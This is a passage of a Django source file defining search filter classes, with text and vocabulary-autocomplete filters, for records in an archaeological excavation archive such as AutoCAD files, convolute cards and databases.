'data-minimum-input-length': 2,
},
)
)
stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_absolute_prepub"
),
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_id_absolute_prepub').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_id_absolute_prepub').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_id"
),
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('phase_id').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ArchaeologicalObject4DPuzzleID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'archaeological_object_id',
'archaeological_object_4dpuzzle_id',
'archaeological_object_comment',
'excavation_object_id',
'position',
'stratum_comment',
'digitisation_comment',
'archaeological_object_type',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'phase_id',
]
class ArchaeologicalObjectIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('legacy_id').help_text,
label=ArchaeologicalObjectID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_name').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_directory').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_type').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_filename').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_extension').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_extension').verbose_name
)
archaeological_object_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('archaeological_object_id').help_text,
label=ArchaeologicalObjectID._meta.get_field('archaeological_object_id').verbose_name
)
archaeological_object_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('archaeological_object_comment').help_text,
label=ArchaeologicalObjectID._meta.get_field('archaeological_object_comment').verbose_name
)
position = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('position').help_text,
label=ArchaeologicalObjectID._meta.get_field('position').verbose_name
)
stratum_id_relative = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('stratum_id_relative').help_text,
label=ArchaeologicalObjectID._meta.get_field('stratum_id_relative').verbose_name
)
stratum_id_absolute_prepub = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('stratum_id_absolute_prepub').help_text,
label=ArchaeologicalObjectID._meta.get_field('stratum_id_absolute_prepub').verbose_name
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('stratum_comment').help_text,
label=ArchaeologicalObjectID._meta.get_field('stratum_comment').verbose_name
)
phase_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('phase_id').help_text,
label=ArchaeologicalObjectID._meta.get_field('phase_id').verbose_name
)
relatedto = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('relatedto').help_text,
label=ArchaeologicalObjectID._meta.get_field('relatedto').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('digitisation_comment').help_text,
label=ArchaeologicalObjectID._meta.get_field('digitisation_comment').verbose_name
)
archaeological_object_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="archaeological_object_type"
),
help_text=ArchaeologicalObjectID._meta.get_field('archaeological_object_type').help_text,
label=ArchaeologicalObjectID._meta.get_field('archaeological_object_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/archaeological_object_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ArchaeologicalObjectID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'archaeological_object_id',
'archaeological_object_comment',
'excavation_object_id',
'position',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'stratum_comment',
'phase_id',
'corresponding_to_archaeological_object_id',
'relatedto',
'digitisation_comment',
'archaeological_object_type',
]
class ArchiveINFListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('legacy_id').help_text,
label=ArchiveINF._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_name').help_text,
label=ArchiveINF._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_directory').help_text,
label=ArchiveINF._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_type').help_text,
label=ArchiveINF._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_filename').help_text,
label=ArchiveINF._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_extension').help_text,
label=ArchiveINF._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('filename').help_text,
label=ArchiveINF._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('document_id').help_text,
label=ArchiveINF._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('document_title').help_text,
label=ArchiveINF._meta.get_field('document_title').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('creation_year_original').help_text,
label=ArchiveINF._meta.get_field('creation_year_original').verbose_name
)
comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('comment').help_text,
label=ArchiveINF._meta.get_field('comment').verbose_name
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=ArchiveINF._meta.get_field('file_extension_archivalobject').help_text,
label=ArchiveINF._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=ArchiveINF._meta.get_field('copyright').help_text,
label=ArchiveINF._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=ArchiveINF._meta.get_field('access').help_text,
label=ArchiveINF._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=ArchiveINF._meta.get_field('site_id').help_text,
label=ArchiveINF._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ArchiveINF
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'filename',
'document_id',
'document_title',
'creation_year_original',
'creation_date_archivalobject',
'creation_date_metadata',
'comment',
'document_type',
'relatedto',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
]
class AutoCADListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('legacy_id').help_text,
label=AutoCAD._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_name').help_text,
label=AutoCAD._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_directory').help_text,
label=AutoCAD._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_type').help_text,
label=AutoCAD._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_filename').help_text,
label=AutoCAD._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_extension').help_text,
label=AutoCAD._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('filename').help_text,
label=AutoCAD._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('document_id').help_text,
label=AutoCAD._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('document_title').help_text,
label=AutoCAD._meta.get_field('document_title').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('path_filename_old').help_text,
label=AutoCAD._meta.get_field('path_filename_old').verbose_name
)
path_filename_arche = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('path_filename_arche').help_text,
label=AutoCAD._meta.get_field('path_filename_arche').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('creation_year_original').help_text,
label=AutoCAD._meta.get_field('creation_year_original').verbose_name
)
relatedto = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('relatedto').help_text,
label=AutoCAD._meta.get_field('relatedto').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('original_comment').help_text,
label=AutoCAD._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('digitisation_comment').help_text,
label=AutoCAD._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=AutoCAD._meta.get_field('file_extension_original').help_text,
label=AutoCAD._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=AutoCAD._meta.get_field('file_extension_archivalobject').help_text,
label=AutoCAD._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=AutoCAD._meta.get_field('copyright').help_text,
label=AutoCAD._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=AutoCAD._meta.get_field('access').help_text,
label=AutoCAD._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=AutoCAD._meta.get_field('site_id').help_text,
label=AutoCAD._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=AutoCAD._meta.get_field('excavation_post_excavation').help_text,
label=AutoCAD._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = AutoCAD
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'filename',
'document_id',
'document_title',
'path_filename_old',
'path_filename_arche',
'creation_year_original',
'creation_date_archivalobject',
'creation_date_metadata',
'excavation_object_id',
'archaeological_object_id',
'relatedto',
'original_comment',
'digitisation_comment',
'document_type',
'file_extension_original',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
'excavation_post_excavation',
]
class ConvolutecardsListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('legacy_id').help_text,
label=Convolutecards._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_name').help_text,
label=Convolutecards._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_directory').help_text,
label=Convolutecards._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_type').help_text,
label=Convolutecards._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_filename').help_text,
label=Convolutecards._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_extension').help_text,
label=Convolutecards._meta.get_field('fc_extension').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('creation_year_original').help_text,
label=Convolutecards._meta.get_field('creation_year_original').verbose_name
)
season = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('season').help_text,
label=Convolutecards._meta.get_field('season').verbose_name
)
filename_document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('filename_document_id').help_text,
label=Convolutecards._meta.get_field('filename_document_id').verbose_name
)
convolute_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('convolute_inventory_number').help_text,
label=Convolutecards._meta.get_field('convolute_inventory_number').verbose_name
)
convolute_subnumber = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('convolute_subnumber').help_text,
label=Convolutecards._meta.get_field('convolute_subnumber').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('filename_old').help_text,
label=Convolutecards._meta.get_field('filename_old').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('storage_folder_original').help_text,
label=Convolutecards._meta.get_field('storage_folder_original').verbose_name
)
month = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('month').help_text,
label=Convolutecards._meta.get_field('month').verbose_name
)
position = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('position').help_text,
label=Convolutecards._meta.get_field('position').verbose_name
)
lowest_height_meters_standard_elevation_zero = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('lowest_height_meters_standard_elevation_zero').help_text,
label=Convolutecards._meta.get_field('lowest_height_meters_standard_elevation_zero').verbose_name
)
maximum_height_meters_standard_elevation_zero = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('maximum_height_meters_standard_elevation_zero').help_text,
label=Convolutecards._meta.get_field('maximum_height_meters_standard_elevation_zero').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('original_comment').help_text,
label=Convolutecards._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('digitisation_comment').help_text,
label=Convolutecards._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Convolutecards._meta.get_field('file_extension').help_text,
label=Convolutecards._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Convolutecards._meta.get_field('copyright').help_text,
label=Convolutecards._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Convolutecards._meta.get_field('access').help_text,
label=Convolutecards._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Convolutecards._meta.get_field('site_id').help_text,
label=Convolutecards._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Convolutecards._meta.get_field('equipment_scan').help_text,
label=Convolutecards._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Convolutecards._meta.get_field('source_original_copy_edited_copy').help_text,
label=Convolutecards._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Convolutecards._meta.get_field('original_material').help_text,
label=Convolutecards._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Convolutecards._meta.get_field('excavation_post_excavation').help_text,
label=Convolutecards._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Convolutecards
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'document_type',
'excavation_id',
'creation_year_original',
'season',
'filename_document_id',
'convolute_inventory_number',
'convolute_subnumber',
'filename_old',
'creation_date_original',
'creation_date_scan',
'creation_date_metadata',
'storage_folder_original',
'resolution_scan_dpi',
'month',
'position',
'lowest_height_meters_standard_elevation_zero',
'maximum_height_meters_standard_elevation_zero',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
class DatenbaseListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('legacy_id').help_text,
label=Datenbase._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_name').help_text,
label=Datenbase._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_directory').help_text,
label=Datenbase._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_type').help_text,
label=Datenbase._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_filename').help_text,
label=Datenbase._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_extension').help_text,
label=Datenbase._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('filename').help_text,
label=Datenbase._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('document_id').help_text,
label=Datenbase._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('document_title').help_text,
label=Datenbase._meta.get_field('document_title').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('creation_year_original').help_text,
label=Datenbase._meta.get_field('creation_year_original').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('path_filename_old').help_text,
label=Datenbase._meta.get_field('path_filename_old').verbose_name
)
path_filename_arche = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('path_filename_arche').help_text,
label=Datenbase._meta.get_field('path_filename_arche').verbose_name
)
relatedto = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('relatedto').help_text,
label=Datenbase._meta.get_field('relatedto').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('original_comment').help_text,
label=Datenbase._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('digitisation_comment').help_text,
label=Datenbase._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=Datenbase._meta.get_field('file_extension_original').help_text,
label=Datenbase._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=Datenbase._meta.get_field('file_extension_archivalobject').help_text,
label=Datenbase._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Datenbase._meta.get_field('copyright').help_text,
label=Datenbase._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Datenbase._meta.get_field('access').help_text,
label=Datenbase._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Datenbase._meta.get_field('site_id').help_text,
label=Datenbase._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="find_material"
),
help_text=Datenbase._meta.get_field('find_material').help_text,
label=Datenbase._meta.get_field('find_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/find_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Datenbase._meta.get_field('excavation_post_excavation').help_text,
label=Datenbase._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Datenbase
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'filename',
'document_id',
'document_title',
'creation_year_original',
'creation_date_archivalobject',
'creation_date_metadata',
'path_filename_old',
'path_filename_arche',
'excavation_object_id',
'archaeological_object_id',
'relatedto',
'original_comment',
'digitisation_comment',
'document_type',
'file_extension_original',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
'find_material',
'excavation_post_excavation',
]
class Document4DPuzzleIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('legacy_id').help_text,
label=Document4DPuzzleID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('fc_name').help_text,
